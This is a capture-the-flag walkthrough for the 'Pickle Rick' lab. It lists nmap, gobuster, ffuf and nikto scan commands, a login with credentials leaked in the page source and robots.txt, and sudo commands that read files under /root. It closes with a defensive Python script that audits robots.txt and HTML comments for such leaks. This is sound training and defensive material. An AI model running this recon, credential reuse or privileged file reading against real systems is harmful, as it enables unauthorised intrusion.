Pickle Rick

subl Readme.md - creates a readme file

s1: nmap scan: nmap -sC -sV -oN <output_file> 10.10.221.23

visit webpage: 10.10.221.23

review source code, found username: R1ckRul3s

run gobuster scan to find directories: gobuster dir -u http://10.10.221.23/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.zip

Directories found:

/login.php (Status: 200)
/assets (Status: 301)
/portal.php (Status: 302)
/robots.txt (Status: 200)
/denied.php (Status: 302)
/server-status (Status: 403)
/clue.txt (Status: 200)

OR run the same scan with ffuf: ffuf -u http://10.10.221.23/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .txt,.php,.zip

perform a nikto scan: nikto -h ip_domain_name

results: "robots.txt" retrieved but it does not contain any 'disallow' entries (which is odd).

/login.php: Admin login page/section found.

visiting http://10.10.221.23/robots.txt : the text Wubbalubbadubdub was found.

visit /login.php, use username: R1ckRul3s, password: Wubbalubbadubdub

use ls to list files

use less Sup3rS3cretPickl3Ingred.txt to reveal first ingredient.

less clue.txt: look around file system for other ingredient.

cd /home/rick; ls; pwd | result: second ingredients /home/rick

less /home/rick/"second ingredients" | result: 1 jerry tear

run sudo ls /root | result: 3rd.txt

run sudo less /root/3rd.txt | result: 3rd ingredients: fleeb juice
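
A pre-deployment check for the two leaks this walkthrough relied on (a username in the page source and a password string in robots.txt), as an added example that is not part of the original notes. It assumes the username sat in an HTML comment; the function names, keyword list and sample markup are constructed for illustration.

```python
import re

# Commonly seen robots.txt field names; any other non-comment line is suspicious.
ROBOTS_FIELDS = {"user-agent", "disallow", "allow", "sitemap", "crawl-delay"}
# Keywords in an HTML comment that suggest a leftover credential note (assumed list).
CRED_HINT = re.compile(r"\b(user(name)?|login|pass(word|wd)?|secret|token)\b", re.I)
COMMENT = re.compile(r"<!--(.*?)-->", re.S)


def audit_robots(text):
    """Return (line_no, line) for robots.txt lines that are not 'field: value'."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        if not line:
            continue
        field, sep, _ = line.partition(":")
        if not sep or field.strip().lower() not in ROBOTS_FIELDS:
            findings.append((n, raw.strip()))
    return findings


def audit_html_comments(html):
    """Return (line_no, text) for HTML comments with credential-like keywords."""
    hits = []
    for m in COMMENT.finditer(html):
        body = " ".join(m.group(1).split())  # collapse multi-line comments
        if CRED_HINT.search(body):
            hits.append((html.count("\n", 0, m.start()) + 1, body))
    return hits


# Constructed sample content modelled on the findings above, not the real pages.
SAMPLE_ROBOTS = "Wubbalubbadubdub\n"
SAMPLE_HTML = """<body>
  <h1>Portal</h1>
  <!-- layout tweak pending -->
  <!--
    Username: R1ckRul3s
  -->
</body>
"""

if __name__ == "__main__":
    for n, line in audit_robots(SAMPLE_ROBOTS):
        print(f"robots.txt:{n}: not a directive: {line!r}")
    for n, body in audit_html_comments(SAMPLE_HTML):
        print(f"index.html:{n}: credential-like comment: {body!r}")
```

Run against the web root before publishing; any finding means content that should not ship to clients.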
